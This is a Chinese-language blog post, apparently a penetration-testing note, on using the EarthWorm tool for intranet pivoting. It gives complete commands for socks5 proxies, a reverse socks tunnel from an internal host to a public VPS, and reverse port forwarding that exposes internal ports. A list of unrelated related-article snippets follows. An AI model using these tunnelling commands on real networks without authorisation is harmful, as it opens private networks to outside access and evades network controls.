ew代理实战
前言
渗透内网代理必不可少,本文做个记录
正文
工具下载地址
http://rootkiter.com/EarthWorm/
ssocksd开启 socks5 代理
环境
代理:192.168.211.131
首先使用
./ew_for_linux64 -s ssocksd -l 12345
在 192.168.211.131:12345 开启了 socks5 代理,设置 proxifier
然后在 192.168.211.131 上监听一个端口, 在 192.168.211.1 使用代理连过去。
可以看到 在 192.168.211.131 收到的连接是由代理服务器 192.168.211.131 发起的
反弹 socks5 代理到公网vps
此时我们可以访问 公网vps, 通过在内网主机反弹 socks5 到公网,然后使用公网的 socks5 服务,连入内网。
首先在公网主机
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
-l 本地监听端口,待会连接这个端口作为 socks5 端口
-e 反弹中转端口
在内网主机
./ew_for_linux64 -s rssocks -d vps_ip -e 8888
-d 指定反弹的主机,这里为 公网 vps 的 ip
-e 指定反弹中转端口,和vps中的设置的一样
此时 vps_ip:1080 开启了 socks5 代理,设置 proxifier
此时通过代理访问
利用lcx_tran端口转发转接socks代理
通过 192.168.211.131 的 1088 端口使用 192.168.211.132 在 9999 端口提供的 socks5 代理。
在 192.168.211.131 执行
./ew_for_linux64 -s lcx_tran -l 1088 -f 192.168.211.132 -g 9999
将来自 1088 的数据转发至 192.168.211.132:9999
在 192.168.211.132 执行
ew_for_Win.exe -s ssocksd -l 9999
然后使用 192.168.211.131:1088 作为 socks5 代理即可
lcx_slave 反向端口转发
使用 lcx_slave 实现将内网端口映射到公网。
首先在公网主机
./ew_for_linux64 -s lcx_listen -l 12234 -e 8989
lcx_listen 本地端口转发,将 12234 转发到 8989
然后在内网主机
ew_for_Win.exe -s lcx_slave -d vps_ip -e 8989 -f 127.0.0.1 -g 9999
lcx_slave 将 vps_ip:8989 的数据转发至 127.0.0.1:9999
然后访问 vps_ip:12234 就是访问 内网主机ip:9999
【参数说明】
ssocksd 本地 socks代理
rssocks 反弹 socks代理
lcx_slave 将远程主机的端口 与 另一台主机建立联系
lcx_tran 将本地端口转发至远程主机
lcx_listen 本地端口转发,本地端口之间建立转发关系
ew代理实战的更多相关文章
- Java动态代理-实战
Java动态代理-实战 只要是写Java的,动态代理就一个必须掌握的知识点,当然刚开始接触的时候,理解的肯定比较浅,渐渐的会深入一些,这篇文章通过实战例子帮助大家深入理解动态代理. 说动态代理之前,要 ...
- 代理模式详解:静态代理+JDK/CGLIB 动态代理实战
1. 代理模式 代理模式是一种比较好的理解的设计模式.简单来说就是 我们使用代理对象来代替对真实对象(real object)的访问,这样就可以在不修改原目标对象的前提下,提供额外的功能操作,扩展目标 ...
- Cobait Strike的socks与ew代理使用
cobait strike介绍 Cobalt Strike 一款以 metasploit 为基础的 GUI 的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe ...
- nginx实现ssl反向代理实战
登录认证account.free4lab.com需要提供ssl登录接口,ssl的原理看这篇博文,因为前面有反向代理nginx,所以这个需求就放在nginx实现了,否则可以放在web容器(jetty,t ...
- Nodejs http-proxy代理实战应用
var https = require('https'); var express = require('express'); var app = express() var http = requi ...
- 原创:Nginx反向代理实战部署
均衡负载服务器 10.0.0.9 [root@web03 conf]# vim nginx.conf worker_processes 1; events { worker_connections ...
- nginx反向代理实战之轮询、Ip_hash、权重
实验环境 192.168.200.111 web1 centos7 192.168.200.112 web2 centos7 192.168.200.113 wev3 centos7 三台主机环境: ...
- Linux实战教学笔记43:squid代理与缓存实践(二)
第6章 squid代理模式案例 6.1 squid传统正向代理生产使用案例 6.1.1 squid传统正向代理两种方案 (1)普通代理服务器 作为代理服务器,这是SQUID的最基本功能:通过在squi ...
- 大数据高并发系统架构实战方案(LVS负载均衡、Nginx、共享存储、海量数据、队列缓存)
课程简介: 随着互联网的发展,高并发.大数据量的网站要求越来越高.而这些高要求都是基础的技术和细节组合而成的.本课程就从实际案例出发给大家原景重现高并发架构常用技术点及详细演练. 通过该课程的学习,普 ...
随机推荐
- JS优先队列排序。出队时,先找出优先级最高的元素,再按照先进先出出队。
JS优先队列排序.出队时,先找出优先级最高的元素,再按照先进先出出队. /* * 优先队列 * 出队时,先找出优先级最高的元素,再按照先进先出出队. * */ function Queue(){ th ...
- Java之IO(二)BufferedInputStream和BufferedOutputStream
转载请注明源出处:http://www.cnblogs.com/lighten/p/6971234.html 1.前言 本文主要介绍输入输出流中的BufferedInputStream和Buffere ...
- 【链表】Add Two Numbers
题目: You are given two linked lists representing two non-negative numbers. The digits are stored in r ...
- python上安装requests
首先需要配置好python的环境变量. 测试是否成功配置,进入命令行,输入python. 如下图为配置成功. 去第三方库的网站下载安装包,解压在python的安装目录 ,下载地址:https://py ...
- android的几种“通知”方式简单实现(Notification&NotificationManager)
关于通知Notification相信大家都不陌生了,平时上QQ的时候有消息来了或者有收到了短信,手机顶部就会显示有新消息什么的,就类似这种.今天就稍微记录下几种Notification的用法.3.0以 ...
- glog功能介绍
1. 概述 Google glog是一个基于程序级记录日志信息的c++库,编程使用方式与c++的stream操作类似,例: LOG(INFO) << &quo ...
- PTA (Advanced Level) 1024 Palindromic Number
Palindromic Number A number that will be the same when it is written forwards or backwards is known ...
- BSDL
BSDL(边界扫描描述语言)文件是使用边界扫描进行电路板级和系统级测试与在系统编程所必需的. BSDL 文件是描述一个 IC 中的 IEEE 1149.1 或 JTAG 设计电子数据表,这些文件由 I ...
- C#开发一应用的总结
要搭建测试环境. Webbrowser使用方面: 重新加载一页面后,要获取新的内容要使用重新使用browser.Document获取: HtmlElement的GetElementsByTagName ...
- Firebird 手动安装 Legacy_Auth 登陆认证
下载官方发布的最新版本:V3.0.4 或者下载还没正式发布的下个版本(但已经修复了一些bug):V3.0.5 下载后解压缩,修改配置文件Firebird.conf的登陆认证为Legacy_Auth:这 ...